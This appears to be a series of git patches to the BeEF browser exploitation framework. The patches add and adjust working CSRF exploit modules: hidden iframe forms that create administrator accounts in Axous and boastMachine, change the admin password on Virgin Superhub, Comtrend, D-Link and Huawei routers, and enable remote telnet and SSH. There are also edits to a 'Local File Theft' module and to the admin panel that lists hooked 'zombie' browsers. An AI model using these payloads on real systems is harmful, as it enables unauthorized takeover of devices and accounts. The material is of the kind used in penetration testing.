+# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + virgin_superhub_csrf: + enable: true + category: ["Exploits", "Router"] + name: "Virgin Superhub CSRF" + description: "Attempts to change the admin password on a Virgin Superhub router." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb new file mode 100644 index 000000000..8a2e5a2d1 --- /dev/null +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -0,0 +1,29 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Virgin_superhub_csrf < BeEF::Core::Command + + def self.options + return [ + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, + {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end From 1bf9061c1ab45d871bbeb2b02e9bb493b191f0e8 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 17:10:37 +0930 Subject: [PATCH 10/17] Added a couple of CSRF modules: o ./modules/exploits/boastmachine_3_1_add_user_csrf/ o ./modules/exploits/axous_1_1_1_add_user_csrf/ Updated a few exploit titles --- .../axous_1_1_1_add_user_csrf/command.js | 40 ++++++++++++++++++ .../axous_1_1_1_add_user_csrf/config.yaml | 25 +++++++++++ .../axous_1_1_1_add_user_csrf/module.rb | 31 ++++++++++++++ .../boastmachine_3_1_add_user_csrf/command.js | 41 +++++++++++++++++++ .../config.yaml | 25 +++++++++++ .../boastmachine_3_1_add_user_csrf/module.rb | 31 ++++++++++++++ .../config.yaml | 2 +- .../exploits/zenoss_add_user_csrf/config.yaml | 2 +- .../exploits/zenoss_daemon_csrf/config.yaml | 2 +- 9 files changed, 196 insertions(+), 3 deletions(-) create mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/command.js create mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/config.yaml create mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/module.rb create mode 100644 modules/exploits/boastmachine_3_1_add_user_csrf/command.js create mode 100644 modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml create mode 100644 modules/exploits/boastmachine_3_1_add_user_csrf/module.rb diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js new file mode 100644 index 000000000..bfa12a6a6 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js @@ -0,0 +1,40 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'new_passwd', 'value':password}, + {'type':'hidden', 'name':'new_passwd1', 'value':password}, + {'type':'hidden', 'name':'email', 'value':email}, + {'type':'hidden', 'name':'dosubmit', 'value':'1'} , + {'type':'hidden', 'name':'id', 'value':''}, + {'type':'hidden', 'name':'action', 'value':'addnew'} , + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(axous_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..4231dc7e8 --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + axous_add_user_csrf: + enable: true + category: "Exploits" + name: "Axous <= 1.1.1 Add User CSRF" + description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)." + authors: ["bcoles", "Ivano Binetti"] + target: + working: ["ALL"] diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb new file mode 100644 index 000000000..ba7f8e63e --- /dev/null +++ b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb @@ -0,0 +1,31 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Axous_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/command.js b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js new file mode 100644 index 000000000..7e312ae66 --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/command.js @@ -0,0 +1,41 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + var base = '<%= @base %>'; + var username = '<%= @username %>'; + var password = '<%= @password %>'; + var email = '<%= @email %>'; + + var boastmachine_iframe = beef.dom.createIframeXsrfForm(base, "POST", [ + {'type':'hidden', 'name':'action', 'value':'add_user'}, + {'type':'hidden', 'name':'do', 'value':'add'}, + {'type':'hidden', 'name':'user_login', 'value':username}, + {'type':'hidden', 'name':'user_pass', 'value':password}, + {'type':'hidden', 'name':'user_name', 'value':username}, + {'type':'hidden', 'name':'user_email', 'value':email}, + {'type':'hidden', 'name':'blogs[]', 'value':'4'}, + {'type':'hidden', 'name':'user_level', 'value':'4'}, + ]); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(boastmachine_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml new file mode 100644 index 000000000..f754f84f7 --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + boastmachine_add_user_csrf: + enable: true + category: "Exploits" + name: "boastMachine <= 3.1 Add User CSRF" + description: "Attempts to add a user to a boastMachine <= 3.1 install." + authors: ["bcoles", "Dr.NaNo"] + target: + working: ["ALL"] diff --git a/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb new file mode 100644 index 000000000..0fcdc068b --- /dev/null +++ b/modules/exploits/boastmachine_3_1_add_user_csrf/module.rb @@ -0,0 +1,31 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Boastmachine_add_user_csrf < BeEF::Core::Command + + def self.options + return [ + { 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'}, + { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, + { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, + { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml index 87d59d542..1dbaace8f 100644 --- a/modules/exploits/spring_framework_malicious_jar/config.yaml +++ b/modules/exploits/spring_framework_malicious_jar/config.yaml @@ -18,7 +18,7 @@ beef: spring_framework_malicious_jar: enable: true category: "Exploits" - name: "Spring Framework Malicious Jar" + name: "Spring Framework Malicious Jar Exploit" description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)" authors: ["bcoles"] target: diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml index 3ae083e7a..eaf9a25f5 100644 --- a/modules/exploits/zenoss_add_user_csrf/config.yaml +++ b/modules/exploits/zenoss_add_user_csrf/config.yaml @@ -18,7 +18,7 @@ beef: zenoss_add_user_csrf: enable: true category: "Exploits" - name: "Zenoss Add User CSRF" + name: "Zenoss <= 3.2.1 Add User CSRF" description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server." authors: ["bcoles"] target: diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml index 9249f7d99..923946d5d 100644 --- a/modules/exploits/zenoss_daemon_csrf/config.yaml +++ b/modules/exploits/zenoss_daemon_csrf/config.yaml @@ -18,7 +18,7 @@ beef: zenoss_daemon_csrf: enable: true category: "Exploits" - name: "Zenoss Daemon CSRF" + name: "Zenoss <= 3.2.1 Daemon CSRF" description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." authors: ["bcoles"] target: From 71133869e49f11714d7e9c1e1848d9285333fa19 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 20:36:10 +0930 Subject: [PATCH 11/17] Added browser details to Hooked Browser balloon messages Fixes issue #521 --- core/main/models/browserdetails.rb | 2 +- .../admin_ui/controllers/panel/panel.rb | 34 ++++++++++----- .../media/javascript/ui/panel/ZombiesMgr.js | 43 ++++++++++++++----- .../javascript/ui/panel/zombiesTreeList.js | 4 +- 4 files changed, 59 insertions(+), 24 deletions(-) diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb index 0cd114c75..8a8f79c61 100644 --- a/core/main/models/browserdetails.rb +++ b/core/main/models/browserdetails.rb @@ -62,7 +62,7 @@ module Models browserdetails end - + # # Returns the icon representing the browser type the # hooked browser is using (i.e. Firefox, Internet Explorer) diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb index f50adb121..c67ec41f7 100644 --- a/extensions/admin_ui/controllers/panel/panel.rb +++ b/extensions/admin_ui/controllers/panel/panel.rb @@ -84,18 +84,30 @@ class Panel < BeEF::Extension::AdminUI::HttpController # create a hash of simple hooked browser details def get_simple_hooked_browser_hash(hooked_browser) - - browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) - os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) - domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') - + + browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') + browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') + browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) + os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) + os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') + has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') + has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + return { - 'session' => hooked_browser.session, - 'ip' => hooked_browser.ip, - 'domain' => domain, - 'port' => hooked_browser.port.to_s, - 'browser_icon' => browser_icon, - 'os_icon' => os_icon + 'session' => hooked_browser.session, + 'ip' => hooked_browser.ip, + 'domain' => domain, + 'port' => hooked_browser.port.to_s, + 'browser_name' => browser_name, + 'browser_version' => browser_version, + 'browser_icon' => browser_icon, + 'os_icon' => os_icon, + 'os_name' => os_name, + 'has_flash' => has_flash, + 'has_web_sockets' => has_web_sockets, + 'date_stamp' => date_stamp } end diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js index c764f94cf..964e586a4 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js +++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js @@ -20,18 +20,41 @@ var ZombiesMgr = function(zombies_tree_lists) { // this is a helper class to create a zombie object from a JSON hash index this.zombieFactory = function(index, zombie_array){ - text = " "; - text += " "; - text += zombie_array[index]["ip"]; + + var ip = zombie_array[index]["ip"]; + var session = zombie_array[index]["session"]; + var browser_name = zombie_array[index]["browser_name"]; + var browser_version = zombie_array[index]["browser_version"]; + var browser_icon = zombie_array[index]["browser_icon"]; + var os_icon = zombie_array[index]["os_icon"]; + var os_name = zombie_array[index]["os_name"]; + var domain = zombie_array[index]["domain"]; + var port = zombie_array[index]["port"]; + var has_flash = zombie_array[index]["has_flash"]; + var has_web_sockets = zombie_array[index]["has_web_sockets"]; + var date_stamp = zombie_array[index]["date_stamp"]; + + text = " "; + text+= " "; + text+= ip; + + balloon_text = "IP: "+ip; + balloon_text+= "
Browser: " + browser_name + " " + browser_version; + balloon_text+= "
System: " + os_name; + balloon_text+= "
Domain: " + domain + ":" + port; + balloon_text+= "
Flash: " + has_flash; + balloon_text+= "
Web Sockets: " + has_web_sockets; + balloon_text+= "
Date: " + date_stamp; var new_zombie = { - 'id' : index, - 'ip' : zombie_array[index]["ip"], - 'session' : zombie_array[index]["session"], - 'text': text, - 'check' : false, - 'domain' : zombie_array[index]["domain"], - 'port' : zombie_array[index]["port"] + 'id' : index, + 'ip' : ip, + 'session' : session, + 'text' : text, + 'balloon_text' : balloon_text, + 'check' : false, + 'domain' : domain, + 'port' : port }; return new_zombie; diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js index 247a44fe9..aa04f300f 100644 --- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js +++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js @@ -196,7 +196,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { var exists = this.getNodeById(hb_id); if(exists) return; - hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port; + hooked_browser.qtip = hooked_browser.balloon_text; //save a new online HB if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) { @@ -220,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, { //creates a new node for that hooked browser node = new Ext.tree.TreeNode(hooked_browser); - + //creates a sub-branch for that HB if necessary mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox); From ebe205ad36b010130e6eb729895e9c2668659100 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 20:44:06 +0930 Subject: [PATCH 12/17] Updated a couple of module configs modules/exploits/router/virgin_superhub_csrf/config.yaml modules/misc/local_file_theft/config.yaml --- modules/exploits/router/virgin_superhub_csrf/config.yaml | 2 +- modules/misc/local_file_theft/config.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml index 11c11a548..8d7a7a3c9 100644 --- a/modules/exploits/router/virgin_superhub_csrf/config.yaml +++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml @@ -20,6 +20,6 @@ beef: category: ["Exploits", "Router"] name: "Virgin Superhub CSRF" description: "Attempts to change the admin password on a Virgin Superhub router." - authors: ["bcoles"] + authors: ["bcoles", "n0x00"] target: working: ["ALL"] diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index 4c44194e1..d6b2c0be4 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml @@ -23,7 +23,7 @@ beef: enable: true category: "Misc" name: "Local File Theft" - description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system." + description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system." authors: ["mh"] target: - working: ["All"] + working: ["S"] From 7fde875d8ac36f21066e9bed29fbc1fe4783e0c7 Mon Sep 17 00:00:00 2001 From: bcoles Date: Sun, 24 Jun 2012 22:21:19 +0930 Subject: [PATCH 13/17] Changed default target IP address to `http://192.168.100.1/` for the virgin_superhub_csrf module --- modules/exploits/router/virgin_superhub_csrf/module.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb index 8a2e5a2d1..28684484d 100644 --- a/modules/exploits/router/virgin_superhub_csrf/module.rb +++ b/modules/exploits/router/virgin_superhub_csrf/module.rb @@ -17,7 +17,7 @@ class Virgin_superhub_csrf < BeEF::Core::Command def self.options return [ - {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, + {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'}, {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'} ] end From 9440afacc91add3e54c64d5838b5d8ffa42544de Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Jun 2012 00:57:26 +0930 Subject: [PATCH 14/17] Removed duplicate `/` from a few CSRF URLs Just in case it causes issues --- modules/exploits/router/comtrend_ct5367_csrf/command.js | 4 ++-- modules/exploits/router/comtrend_ct5624_csrf/command.js | 2 +- modules/exploits/router/dlink_dsl500t_csrf/command.js | 2 +- modules/exploits/router/huawei_smartax_mt880/command.js | 2 +- modules/exploits/router/virgin_superhub_csrf/command.js | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index fdbedec46..d713b6b06 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js @@ -18,12 +18,12 @@ beef.execute(function() { var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); - form.setAttribute('action', gateway + "/password.cgi"); + form.setAttribute('action', gateway + "password.cgi"); form.setAttribute('method', 'post'); var input = null; diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index b6cc7ab28..afe248983 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js @@ -18,7 +18,7 @@ beef.execute(function() { var passwd = '<%= @password %>'; var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); var ct5367_iframe2 = beef.dom.createInvisibleIframe(); ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index ae1c98e23..f25c89a5b 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -17,7 +17,7 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST", + var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index a749117a8..bfe98e957 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -19,7 +19,7 @@ beef.execute(function() { var passwd = '<%= @password %>'; var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index 5acb91421..3c84ee315 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js @@ -18,7 +18,7 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; - var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [ + var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd} , {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} From 268ef4588f54635462829def863ad2532ffec5b3 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Jun 2012 01:35:33 +0930 Subject: [PATCH 15/17] Added device/hardware detection --- core/core.rb | 1 + core/filters/browser.rb | 10 +++ core/main/client/browser.js | 2 + core/main/client/hardware.js | 74 ++++++++++++++++++ core/main/client/os.js | 20 ++++- core/main/constants/hardware.rb | 73 +++++++++++++++++ core/main/constants/os.rb | 20 +++-- core/main/handlers/browserdetails.rb | 8 ++ core/main/handlers/modules/beefjs.rb | 4 +- core/main/models/browserdetails.rb | 27 ++++++- .../admin_ui/controllers/modules/modules.rb | 17 +++- .../admin_ui/controllers/panel/panel.rb | 6 +- .../admin_ui/media/images/icons/ios.png | Bin 0 -> 38666 bytes .../admin_ui/media/images/icons/iphone.jpg | Bin 0 -> 1721 bytes .../admin_ui/media/images/icons/iphone.png | Bin 1577 -> 0 bytes .../admin_ui/media/images/icons/kindle.png | Bin 0 -> 4408 bytes extensions/admin_ui/media/images/icons/pc.png | Bin 0 -> 2521 bytes .../admin_ui/media/images/icons/zune.gif | Bin 0 -> 1701 bytes .../media/javascript/ui/panel/ZombiesMgr.js | 4 + extensions/console/lib/shellinterface.rb | 15 ++++ 20 files changed, 259 insertions(+), 22 deletions(-) create mode 100644 core/main/client/hardware.js create mode 100644 core/main/constants/hardware.rb create mode 100644 extensions/admin_ui/media/images/icons/ios.png create mode 100644 extensions/admin_ui/media/images/icons/iphone.jpg delete mode 100644 extensions/admin_ui/media/images/icons/iphone.png create mode 100644 extensions/admin_ui/media/images/icons/kindle.png create mode 100644 extensions/admin_ui/media/images/icons/pc.png create mode 100644 extensions/admin_ui/media/images/icons/zune.gif diff --git a/core/core.rb b/core/core.rb index dc554314b..6dcff13f2 100644 --- a/core/core.rb +++ b/core/core.rb @@ -34,6 +34,7 @@ require 'core/main/constants/browsers' require 'core/main/constants/commandmodule' require 'core/main/constants/distributedengine' require 'core/main/constants/os' +require 'core/main/constants/hardware' # @note Include core modules for beef require 'core/main/configuration' diff --git a/core/filters/browser.rb b/core/filters/browser.rb index f955fb6f6..7dbcfdfc6 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -47,6 +47,16 @@ module Filters true end + # Check the Hardware name value - for example, 'iPhone' + # @param [String] str String for testing + # @return [Boolean] If the string has valid Hardware name characters + def self.is_valid_hwname?(str) + return false if not is_non_empty_string?(str) + return false if has_non_printable_char?(str) + return false if str.length < 2 + true + end + # Verify the browser version string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser version characters diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 762072108..9a243aad4 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -765,6 +765,7 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var date_stamp = new Date().toString(); var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_size = beef.browser.getScreenSize(); @@ -789,6 +790,7 @@ beef.browser = { if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(hw_name) details['Hardware'] = hw_name; if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js new file mode 100644 index 000000000..f498c53ac --- /dev/null +++ b/core/main/client/hardware.js @@ -0,0 +1,74 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless 